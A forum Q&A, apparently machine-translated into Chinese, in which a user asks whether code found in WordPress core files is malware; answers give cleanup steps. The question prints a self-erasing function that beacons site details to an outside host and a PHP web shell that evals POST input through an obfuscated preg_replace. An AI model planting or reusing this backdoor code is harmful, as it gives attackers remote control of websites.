這是wordpress病毒嗎？

Question

我剛剛注意到，我的一些wordpress項目在特定位置包含一些隨機代碼。

例如： WP-包括/ meta.php包含的以下文件代碼底部：

check_meta(); 
function check_meta(){ 
    $jp = __FILE__; 
    $jptime = filemtime($jp); 

    if(time() >= 1456732115){ 
     $jp_c = file_get_contents($jp); 
     if($t = @strpos($jp_c,"check_meta();")) { 
      $contentp = substr($jp_c,0,$t); 
      if(@file_put_contents($jp, $contentp)){ 
       @touch($jp,$jptime); 
      } 
     } 
    } 
    @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/wp-includes/ID3/getid.php"); 
} 

另一個位置：WP-包括/ ID3/getid.php包括下面的代碼：

<?php if(isset($_GET['test'])){echo 'success';}else{isset($_POST['ttr6i']) && ($www= $_POST['ttr6i']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?> 

基本上，我所看到的是，check_meta（）方法更新wp-includes/meta.php文件沒有改變它的修改時間。然後，file_get_contents正在連接一些中國服務器，並通過一些數據通過$ _GET。

在第二個文件，str_rot13（ 'riny'）等於EVAL

有誰處理那樣的問題之前？也許有人可以說更多關於這個代碼。期待您的迴音。就目前而言，我把它當作一種病毒，因爲它已經蔓延到我的許多項目中。

Answer 1

永遠不要相信陌生的代碼，你不包括！詐騙者經常試圖使惡意軟件看起來無害，就像上面一樣。嘗試安裝WordFence，Sucuri或其他安全插件並運行掃描。

Answer 2

看起來您的服務器已被黑客攻擊過去，我不得不處理類似的問題一次或兩次。是的，黑客似乎是專門針對WordPress網站的。

無論如何，永遠不應修改WordPress核心。

1. 更改所有服務器的密碼（客戶服務中心，FTP，SSH，SQL，等等）

2. 下載WordPress的核心的全新安裝和刪除舊

3. 檢查您的wp -content文件夾的安全問題，尤其是你的主題和你的插件（檢查任何修改或不安全的代碼）

4. 在wp-config.php中更改安全鹽

5. 經過全新的WordPress站點設置後，安全性得到提高。有關如何保護WordPress的各種文章，並有幾個WordPress安全插件可用。掃描您的網站。

6. 如果再次出現類似問題，您還應該檢查您的網絡服務器/網絡主機的安全設置。